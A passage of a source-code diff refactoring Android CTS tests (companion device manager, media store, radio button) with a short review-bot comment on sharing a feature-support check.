- runShellCommandOrThrow("cmd companiondevice disassociate $userId $packageName $address")
+ runShellCommandOrThrow(
+ "cmd companiondevice disassociate $userId $TEST_APP_PACKAGE_NAME $address")
}
}
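Review bot: `removeAllAssociations` restates the skip condition of `assumeHasFeature` as `!hasFeatureCompanionDeviceSetup || isAuto`, so the two can drift apart when a precondition is added to one of them. A single property such as `private val isSupported by lazy { hasFeatureCompanionDeviceSetup && !isAuto }`, used by both methods, keeps them in step. The new comment should read "If the device does not have the feature".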
@@ -168,10 +181,8 @@ class CompanionDeviceManagerTest : InstrumentationTestCase() {
@AppModeFull(reason = "Companion API for non-instant apps only")
@Test
fun testProfiles() {
- val packageName = "android.os.cts.companiontestapp"
- installApk(
- "--user ${UserHandle.myUserId()} /data/local/tmp/cts/os/CtsCompanionTestApp.apk")
- startApp(packageName)
+ installApk("--user ${UserHandle.myUserId()} $TEST_APP_APK_LOCATION")
+ startApp(TEST_APP_PACKAGE_NAME)
waitFindNode(hasClassThat(`is`(equalTo(EditText::class.java.name))))
.performAction(ACTION_SET_TEXT,
@@ -191,24 +202,24 @@ class CompanionDeviceManagerTest : InstrumentationTestCase() {
device!!.click()
eventually {
- assertThat(getAssociatedDevices(packageName), not(empty()))
+ assertThat(getAssociatedDevices(TEST_APP_PACKAGE_NAME), not(empty()))
}
- val deviceAddress = getAssociatedDevices(packageName).last()
+ val deviceAddress = getAssociatedDevices(TEST_APP_PACKAGE_NAME).last()
runShellCommandOrThrow("cmd companiondevice simulate_connect $deviceAddress")
- assertPermission(packageName, "android.permission.CALL_PHONE", PERMISSION_GRANTED)
+ assertPermission(
+ TEST_APP_PACKAGE_NAME, "android.permission.CALL_PHONE", PERMISSION_GRANTED)
runShellCommandOrThrow("cmd companiondevice simulate_disconnect $deviceAddress")
- assertPermission(packageName, "android.permission.CALL_PHONE", PERMISSION_GRANTED)
+ assertPermission(
+ TEST_APP_PACKAGE_NAME, "android.permission.CALL_PHONE", PERMISSION_GRANTED)
}
@AppModeFull(reason = "Companion API for non-instant apps only")
@Test
fun testRequestNotifications() {
- val packageName = "android.os.cts.companiontestapp"
- installApk(
- "--user ${UserHandle.myUserId()} /data/local/tmp/cts/os/CtsCompanionTestApp.apk")
- startApp(packageName)
+ installApk("--user ${UserHandle.myUserId()} $TEST_APP_APK_LOCATION")
+ startApp(TEST_APP_PACKAGE_NAME)
waitFindNode(hasClassThat(`is`(equalTo(EditText::class.java.name))))
.performAction(ACTION_SET_TEXT,
diff --git a/tests/tests/provider/preconditions/Android.bp b/tests/tests/provider/preconditions/Android.bp
index 289aab5b1ea..f636464db68 100644
--- a/tests/tests/provider/preconditions/Android.bp
+++ b/tests/tests/provider/preconditions/Android.bp
@@ -14,7 +14,8 @@ java_test_helper_library {
test_suites: [
"cts",
"general-tests",
- "sts"
+ "sts",
+ "mts"
],
host_supported: true,
device_supported: false,
diff --git a/tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java b/tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java
index ed33af85f11..baeca9ceea6 100644
--- a/tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java
+++ b/tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java
@@ -266,6 +266,7 @@ public class MediaStoreTest {
}
@Test
+ @SdkSuppress(minSdkVersion = 31, codeName = "S")
public void testCanManageMedia() throws Exception {
final String opString = AppOpsManager.permissionToOp(Manifest.permission.MANAGE_MEDIA);
diff --git a/tests/tests/widget/src/android/widget/cts/RadioButtonTest.java b/tests/tests/widget/src/android/widget/cts/RadioButtonTest.java
index 72cff7f307f..67a12a00152 100644
--- a/tests/tests/widget/src/android/widget/cts/RadioButtonTest.java
+++ b/tests/tests/widget/src/android/widget/cts/RadioButtonTest.java
@@ -19,6 +19,7 @@ package android.widget.cts;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.timeout;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.verifyNoMoreInteractions;
@@ -160,7 +161,7 @@ public class RadioButtonTest {
}
@Test
- public void testToggleViaEmulatedTap() {
+ public void testToggleViaEmulatedTap() throws Throwable {
final RadioButton.OnCheckedChangeListener mockCheckedChangeListener =
mock(RadioButton.OnCheckedChangeListener.class);
mRadioButton.setOnCheckedChangeListener(mockCheckedChangeListener);
@@ -170,7 +171,8 @@ public class RadioButtonTest {
// tap to checked
CtsTouchUtils.emulateTapOnViewCenter(mInstrumentation, mActivityRule, mRadioButton);
- verify(mockCheckedChangeListener, times(1)).onCheckedChanged(mRadioButton, true);
+ // wait for the posted onClick() after the tap
+ verify(mockCheckedChangeListener, timeout(5000)).onCheckedChanged(mRadioButton, true);
assertTrue(mRadioButton.isChecked());
// tap to not checked - this should leave the radio button in checked state